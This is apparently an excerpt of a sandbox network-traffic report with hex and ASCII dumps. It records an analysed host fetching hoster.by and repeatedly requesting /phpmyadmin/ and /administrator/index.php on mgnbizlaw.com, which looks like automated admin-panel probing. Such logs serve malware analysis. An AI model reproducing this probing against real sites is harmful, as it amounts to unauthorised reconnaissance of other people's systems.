                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                26192.168.2.655199178.172.160.19443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: hoster.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC617INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 37 33 37 35 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 48 54 54 50 53 0d 0a 50 33 50 3a 20 70 6f 6c 69 63 79 72 65 66 3d 22 2f 62 69 74 72 69 78 2f 70 33 70 2e 78 6d 6c 22 2c 20 43 50 3d 22 4e 4f 4e 20 44 53 50 20 43 4f 52 20 43 55 52 20 41 44 4d 20 44 45 56 20 50 53 41 20 50 53 44 20 4f 55 52 20 55 4e 52 20 42 55 53 20 55 4e 49 20 43 4f 4d 20 4e 41 56 20 49 4e 54 20 44 45 4d 20 53 54 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKDate: Sat, 02 Dec 2023 01:09:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 473755Connection: closeVary: HTTPSP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC15767INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 2e 61 73 79 6e 63 2d 68 69 64 65 20 7b 20 6f 70 61 63 69 74 79 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 20 3c 2f 73 74 79 6c 65 3e 0d 0a 09 3c 74 69 74 6c 65 3e d0 90 d1 80 d0 b5 d0 bd d0 b4 d0 b0 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 20 d0 b8 20 d0 be d0 b1 d0 bb d0 b0 d1 87 d0 bd d1 8b d1 85 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d0 b9 20 d0 b4 d0 bb d1 8f 20 d0 b1 d0 b8 d0 b7 d0 bd d0 b5 d1 81 d0 b0 2e 20 d0 9a d1 83 d0 bf d0 b8 d1 82 d1 8c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 b2 20 d0 91 d0 b5 d0 bb d0 b0 d1 80 d1 83 d1 81
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ru"><head> <style>.async-hide { opacity: 0 !important} </style><title> .
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 35 30 25 20 d0 bf d1 80 d0 b8 20 d0 bf d0 b5 d1 80 d0 b5 d0 bd d0 be d1 81 d0 b5 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d0 bd d0 b0 20 68 6f 73 74 65 72 2e 62 79 22 2c 0a 09 09 09 22 61 64 64 72 65 73 73 22 3a 20 7b 0a 09 09 09 09 22 40 74 79 70 65 22 20 3a 20 22 50 6f 73 74 61 6c 41 64 64 72 65 73 73 22 2c 0a 09 09 09 09 22 61 64 64 72 65 73 73 4c 6f 63 61 6c 69 74 79 22 20 3a 20 22 d0 9c d0 b8 d0 bd d1 81 d0 ba 22 2c 0a 09 09 09 09 22 73 74 72 65 65 74 41 64 64 72 65 73 73 22 20 3a 20 22 d1 83 d0 bb 2e 20 d0 90 d1 80 d0 b0 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 38 22 2c 0a 09 09 09 09 22 70 6f 73 74 61 6c 43 6f 64 65 22 20 3a 20 22 32 32 30 31 34 30 22 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 09 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                                                Data Ascii: 50% hoster.by","address": {"@type" : "PostalAddress","addressLocality" : "","streetAddress" : ". 8","postalCode" : "220140"}}}</script
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 68 6f 73 74 65 72 2e 62 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 68 6f 69 73 2d d1 81 d0 b5 d1 80 d0 b2 d0 b8 d1 81 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://whois.hoster.by/" class="menu-item-link m-font-b1" id="menu-item"> <span>Whois-</span>
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 63 6c 6f 75 64 2f 6d 61 69 6c 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="/service/cloud/mail/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 73 6f 6c 75 74 69 6f 6e 73 2f 6d 6f 76 65 2f 68 6f 73 74 69 6e 67 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: </a> <a href="/service/solutions/move/hosting/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 63 6c 69 65 6e 74 73 2f 64 6f 63 75 6d 65 6e 74 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 20 6d 2d 66 6f 6e 74 2d 62 31 22 20 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: </a> <a href="/clients/documents/" class="menu-item-link m-font-b1" id="menu-item">
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 74 69 74 6c 65 22 3e 53 4d 53 2d d0 bf d0 be d0 b4 d1 82 d0 b2 d0 b5 d1 80 d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d0 b5 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 74 69 74 6c 65 22 3e d0 9f d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 b2 d0 b2 d0 b5 d0 b4 d0 b8 d1 82 d0 b5 20 d0 ba d0 be d0 b4 20 d0 bf d0 be d0 b4 d1 82 d0 b2 d0 b5 d1 80 d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d1 8f 2c 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b9 20 d0 bd d0 b0 20 d0 bd d0 be d0 bc d0 b5 d1 80 20 3c 73 70 61 6e 20 6e 61 6d 65 3d 22 70 68 6f 6e 65 64 75 70 6c 65 78 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 62 79 2d 73
                                                                                                                                                                                                                                                                                                                Data Ascii: title">SMS-</div> <div class="subtitle">, , <span name="phoneduplex"></span></div> <div class="hby-s
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 68 62 79 2d 6c 61 62 65 6c 22 20 66 6f 72 3d 22 65 6d 61 69 6c 22 3e d0 92 d0 b0 d1 88 20 45 6d 61 69 6c 2a 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 62 79 2d 65 72 72 6f 72 2d 74 65 78 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e d0 9f d1 80 d0 be d0 b2 d0 b5 d1 80 d1 82 d0 b5 20 d0 ba d0 be d1 80 d1 80 d0 b5 d0 ba d1 82 d0 bd d0 be d1 81 d1 82 d1 8c 20 d0 b2 d0 b2 d0 b5 d0 b4 d1 91 d0 bd d0 bd d0 be d0 b3 d0 be 20 45 6d 61 69 6c 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <label class="hby-label" for="email"> Email*</label> <div class="hby-error-text" style="display: none;"> Email</div>
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC16384INData Raw: 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 6c 69 6e 6b 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 2f 73 6f 6c 75 74 69 6f 6e 73 2f 69 6e 66 6f 72 6d 61 74 73 69 6f 6e 6e 61 79 61 2d 62 65 7a 6f 70 61 73 6e 6f 73 74 2f 61 74 74 65 73 74 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 2d 61 72 72 6f 77 22 20 77 69 64 74 68 3d 22 38 22 20 68 65
                                                                                                                                                                                                                                                                                                                Data Ascii: v class="product-link-item"> <a href="/service/solutions/informatsionnaya-bezopasnost/attestation/" class="m-link"> <svg xmlns="http://www.w3.org/2000/svg" class="link-arrow" width="8" he


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                27192.168.2.6553313.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC246OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                28192.168.2.6554763.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC305OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: https://mgnbizlaw.com/administrator/
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:28 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                29192.168.2.6556783.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC247OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.119.144.218; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                30192.168.2.6558983.33.130.190443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:29 UTC305OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: https://mgnbizlaw.com/administrator/
